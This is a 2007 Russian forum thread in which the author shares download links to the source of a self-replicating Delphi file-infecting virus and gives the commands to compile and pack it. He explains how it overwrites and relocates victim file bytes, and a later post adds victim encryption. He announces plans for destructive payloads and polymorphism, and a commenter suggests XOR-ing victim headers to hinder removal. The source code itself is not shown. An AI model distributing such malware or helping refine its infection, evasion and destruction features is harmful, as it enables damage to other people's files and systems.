|
|
Регистрация Восстановить пароль |
Повторная активизация e-mail |
Регистрация | Задать вопрос |
Заплачу за решение |
Новые сообщения |
Сообщения за день |
Расширенный поиск |
Правила |
Всё прочитано |
Результаты опроса: Как вы оцениваете представленное в теме? | |||
Круто, жду следующих обновлений!!! | 26 | 70.27% | |
Норма, я так то же умею... | 5 | 13.51% | |
Не вижу ни чего не обычного, да и вирусы маздай! | 4 | 10.81% | |
Чистая гавносрачь, аффтара фтопку... | 2 | 5.41% | |
Голосовавшие: 37. Вы ещё не голосовали в этом опросе |
|
|
Опции темы | Поиск в этой теме |
07.11.2007, 11:12 | #1 |
Редкий тунеядец
Форумчанин
Регистрация: 29.10.2006
Сообщений: 595
|
Файловый вирус на делфи весом 2357 байт
Довольно многие люди считают вирусом всё что угодно кроме того что это есть... За вирусы принимают всевозможные трояны, черви и даже всякие шуточные проги и всевозможный хактулс типо генераторов вирей и сканеров))) А ведь в первоисточнике вирус вовсе не имеет ни чего общего с вышеперечисленным и его главной особенностью и отличием является то что вирусы способны распространяться своими копиями (не всегда равными себе) и/или имеют возможность заражения своим кодом другие файлы..
Так же многие люди считают что на делфи не пригоден для написания компактных вирусов.. Я решился взяться за разъяснение двух этих проблем: 1)За счет подробных коментов я решил пояснить принцип работы вирусов 2)За счёт применения особой методики написания программ получить вирус на делфи минимального размера.. Результатом работы стал HLLP вирус весом 2357 байт... Подробный его качественно откоментированный исходник а так же всё что необходимо для компиляции ехе находится в архиве: http://virusoff.pisem.su/virus.rar Для компиляции ехе нет необходимости даже в Делфи достаточно просто запустить файл vir.bat для компиляции и упаковки ехе... Хотя в принципе можно и в делфи открыть исходник, только придется предварительно в папке с исходником выполнить команду: DCC32 -Q system.pas sysinit.pas -M -Y -Z -$D- -O (например с помощью ВАТ-ника)... После этого появится два файла: system.dcu и sysinit.dcu при компиляциииз делфи придется паковать в ручную, но упаковщик FSG входит в состав архива... В общем надеюсь что этот вирус заинтересует новичков и в чем-то поможет более опытным кодерам, например работа с файлами, поиск файлов на API это весьма редко встречаемая в сети тема... Пришлось расшаривать самостоятельно... Плюс вы сможете разобраться в принципах создания программ без RTL (малого размера) и как следствие разберётесь с тем как можно обходится в работе со строками без типа string, а так же как импортировать из системных библиотек функции... НЕ ИСПОЛЬЗУЙТЕ ЭТОТ ИСХОДНИК В КОРЫСТНЫХ ЦЕЛЯХ!! УДАЧИ!! PS: Приложив минимальные усилия можно сделать вирус значительно более качественным и деловым, но пока я этого делать не хочу... Возможно вы сами это сделаете и ли я позже выложу доработанные версии. |
07.11.2007, 11:44 | #2 |
With best regards
Участник клуба
Регистрация: 20.04.2007
Сообщений: 1,448
|
Коменты рулят, спасибо, почитаю.
p.s.:исключительно в ознакомительных целях.
Life is too short, play more...
Как правильно задавать вопросы |
07.11.2007, 12:06 | #3 |
я получил эту роль
Старожил
Регистрация: 25.05.2007
Сообщений: 3,694
|
Эй, а как стандартная же пара-тройка ошибок в коде в целях "защиты от дурака"?
-- А.... это без перекраивания PE, а-ля copy /b virus.exe program.exe (по типу Undersor'a) Предлагаю для полного счастья ещё поXORить заголовок файла-жертвы, чтоб не так легко отодрать было
пыщь
Последний раз редактировалось JTG; 07.11.2007 в 12:18. |
07.11.2007, 13:10 | #5 | |
Редкий тунеядец
Форумчанин
Регистрация: 29.10.2006
Сообщений: 595
|
Цитата:
1байт вируса VirSize байт вируса VirSize+1 жертвы последний байт жертвы 1 байт жертвы Virsize байт жертвы Такое заражение выгодно тем что не нужен временый файл, просто копируется кусок жертвы размером как вирус в конец жертвы а в начало с перезаписью пишется вирус... Все это в ближайшее время будет реализовано))) Затем я сделаю запуск жертвы не в темп , а на прямую в память... Далее я собираюсь сделать сохранение иконки жертвы, т.е. установка иконки жертвы на вирус))) Еще будут мелкие вкусности типо сохранение атрибутов времени создания и т.д. После полного отлаживания и доведения до ума вируса можно будет разработать для него толковый набор диструктивных функций и продумать полиморфность)) Желающие получить ответы на вопросы по теме или помочь в этом дельце стучим в асю.. |
|
08.11.2007, 04:23 | #6 | |
Банхаммер
Участник клуба
Регистрация: 17.02.2007
Сообщений: 1,754
|
респект тебе... скажи что использовал для написания проги?
Цитата:
Последний раз редактировалось Viteef; 08.11.2007 в 04:50. |
|
08.11.2007, 12:17 | #7 | |
Редкий тунеядец
Форумчанин
Регистрация: 29.10.2006
Сообщений: 595
|
Цитата:
1)Компилятор Delphi 2)Блокнот 3)Комплект файлов необходимых для компиляции без Delphi 4)Упаковщик FSG 5)Справка по Win32API для Delphi 6)Не много мозгов 7)Не много свободного времени Это пожалуй всё что я использовал для написания)))) |
|
17.11.2007, 23:52 | #8 |
Редкий тунеядец
Форумчанин
Регистрация: 29.10.2006
Сообщений: 595
|
Времени совсем нет.. Но я решил немного доделать вирус..
Что нового: 1)Изменено заражение - теперь заражение происходит без временного файла и какого-либо мусора... У жертвы копируется из начала в конец кусок размером как вирус.. затем на места первых VirSize байт с перезаписью пишутся байты виря... (Запуск пока что по старому, т.е. в темпе) 2)Добавлено шифрование жертвы (шифруется вычисляемым ключем фрагмент жертвы переносимый в конец..) 3)Переработана процедура поиска дисков... (избавился от массива дисков за счёт применения ф-ии - GetLogicalDriveStrings) 4)Немного оптимизирован код, и как следствие размер вируса, несмотря на добавленые изменения уменьшился на 56 байт - (2301 байт) Вот линк на исходник: http://virusoff.pisem.su/vir2.rar Принцип компиляции и т.д. осталось неизменным, поэтому просто замените этим исходником старый... |
18.11.2007, 11:12 | #9 |
Delphi/C++/C#
Участник клуба
Регистрация: 29.10.2006
Сообщений: 1,972
|
Комментариев больше чем кода - все бы так писали
|
18.11.2007, 16:03 | #10 | |
Редкий тунеядец
Форумчанин
Регистрация: 29.10.2006
Сообщений: 595
|
Цитата:
|
|
|
Похожие темы | ||||
Тема | Автор | Раздел | Ответов | Последнее сообщение |
срочно!!!! NEED HELP! Вирус! | bill | Свободное общение | 23 | 31.03.2009 14:35 |
Вирус | komex | Безопасность, Шифрование | 13 | 22.09.2008 16:22 |
1 байт 9 бит ?! | Иллидан | Assembler - Ассемблер (FASM, MASM, WASM, NASM, GoASM, Gas, RosAsm, HLA) и не рекомендуем TASM | 4 | 13.04.2008 12:47 |
Вычистить вирус | ofry | JavaScript, Ajax | 4 | 16.11.2007 15:02 |
обновление в блоге - Микроокошко на делфи (1280 байт) | Pblog | Обсуждение статей | 0 | 05.10.2007 13:12 |